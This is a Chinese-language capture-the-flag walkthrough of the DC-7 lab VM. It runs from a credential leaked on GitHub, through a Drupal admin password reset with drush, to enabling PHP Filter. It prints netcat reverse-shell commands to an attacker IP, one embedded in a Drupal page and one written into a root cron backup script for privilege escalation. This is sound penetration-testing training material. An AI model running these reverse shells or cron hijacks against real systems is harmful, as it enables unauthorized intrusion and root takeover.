专栏首页HACKWAYDC-7靶机渗透实战

DC-7靶机渗透实战

靶机介绍

这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址[1],需要更详细的资料可以参考文章1[2]文章2[3]文章3[4]

信息搜集

nmap开路

开放了80http端口,访问一下:

根据作者提示:

DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  ?<br/>
While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.<br/>
What you will have to do, is to think "outside" the box.<br/>
Way "outside" the box.  ?</p>


<p>dc-7引入了一些“新”概念,但我还是让你们自己来弄清楚它们是什么。----)
虽然这个挑战并不完全是技术性的,但如果你需要诉诸粗暴的强迫或字典攻击,你可能不会成功。
你要做的是,想“外面”的盒子。“外面”的盒子。----)

Tips: 这里的盒子应该是泛指不是爆破和字典攻击,让我们跳出传统的思维,进行深入的信息搜集

看到左下角的Powered by Drupal下面还有个@DC7USER,直接找到源代码仓库

我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码

dc7user: MdR3xOgB7#dW

渗透实战

连上ssh后在dc7user的home目录下发现了gpg加密的website.sql文件和一个mbox邮件

可以看到登上去就提示有邮件mail。 在当前目录下,看到mbox文件和backups目录,backups里website.sql.gpg 和website.tar.gz.gpg两个gpg文件,gpg是用来加密文件的:

查看mbox文件后,发现每个邮件都有backups.sh,查看一下

得出结论:每隔一段时间就执行这个文件,实现对数据库和站点代码进行备份加密,并删掉了原来的,只留下加密后的。 sh文件中使用了drush,可以使用其来更改用户密码(注意:需要进入/var/www/html目录下才可执行): drush user-password admin --password="admin"修改admin的密码为admin

ok,现在去后台看看

后台文本编辑模块是没有PHP的,需要自己添加,手动添加PHP参考文章[5]

找到Manage下的Extend,点击Install new module:

点击Enable newly added modules,在里面找到PHP Filter,勾上:

然后拉到最下面Install:

下载模块

下载成功 点击Enable启用模块

选中PHP添加进去

反弹shell

Manage -> Content -> edit: &lt;?php system('nc -e /bin/bash 192.168.246.138 8888')?&gt;

保存后,kali监听8888端口,然后访问其首页:

python返回交互式shell: python -c 'import pty;pty.spawn("/bin/bash")'

提权

前面提到backups.sh会每隔一段时间执行一次进行备份,需要root权限才能进行的操作,可以在backups.sh中写入shell,反弹回来即为root权限: echo "nc 192.168.246.138 6666 -e /bin/bash" &gt; /opt/scripts/backups.sh

在kali上监听6666端口,等了一会之后就收到了: 返回交互式shell:

参考资料

[1]

靶机下载地址: http://www.five86.com/dc-7.html

[2]

参考文章1: https://blog.csdn.net/weixin_44426869/article/details/104883470

[3]

参考文章2: https://blog.csdn.net/weixin_43762939/article/details/102561570

[4]

参考文章3: https://blog.csdn.net/weixin_46128614/article/details/104037722

[5]

后台添加PHP code:: https://blog.csdn.net/weixin_43583637/article/details/102809227

本文分享自微信公众号 - HACKWAY(gh_7a5a315cde00),作者:HACKWAY

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-08-10

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Sublime编辑器配置Python环境

    Sublime Text 是一个轻便型的编辑器,简约又不简单,支持多种编程语言和第三方拓展插件,居家打码良器。

    轩辕小子
  • DC-4靶机渗透实战

    这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-4.html

    轩辕小子
  • DC-5靶机渗透实战

    这次的靶机渗透实战是一个找寻靶机中的flag的过程,并以获得最终的flag为目标。靶机下载地址:http://www.five86.com/dc-5.html

    轩辕小子
  • 字符,字符串,字符编码的区别

    字符集和字符编码一般都是成对出现的,如ASCII、IOS-8859-1、GB2312、GBK,都是即表示了字符集又表示了对应的字符编码,以后统称为编码。

    居士
  • 5G、6G通讯技术有可能封顶吗?通信技术发展是没有止境的吗?

    科技的发展是永远没有极限的,而且科技的发展有可能在很短的时间内就能完成质变,就拿手机行业的发展来看发展速度都是极其惊人的,在很长一段时间内家里配备一台电话机来通...

    程序员互动联盟
  • 如何白嫖3个月的JetBrains全家桶(包括Java神器IDEA)

    说JetBrains官网搞了谜题,解出来赠送3个月的全家桶订阅。开启福尔摩斯之魂。

    编程之心
  • 如何白嫖3个月的JetBrains全家桶(包括Java神器IDEA)

    说JetBrains官网搞了谜题,解出来赠送3个月的全家桶订阅。开启福尔摩斯之魂。

    编程之心
  • Spring Boot自动化配置的利弊及解决之道

    双刃剑:自动化配置 之前在博客中发布的大量Spring Boot基础教程系列文章中,我们通过各种功能性示例体验了Spring Boot的自动化配置给我们所带来的...

    程序猿DD
  • 移动可用性测试 (一): 概述

    作者:梁颖蕾,腾讯高级设计师 前言 移动互联网时代,针对移动产品进行的可用性测试,主要是将PC产品可用性测试方法和经验照搬过来。但在实际的工作中,由于移动产品...

    腾讯大讲堂
  • 上海矽杰卢煜旻:芯片同所有产品一样,抓住客户需求、维持高性价比很重要 | 镁客请讲

    镁客网

扫码关注云+社区

领取腾讯云代金券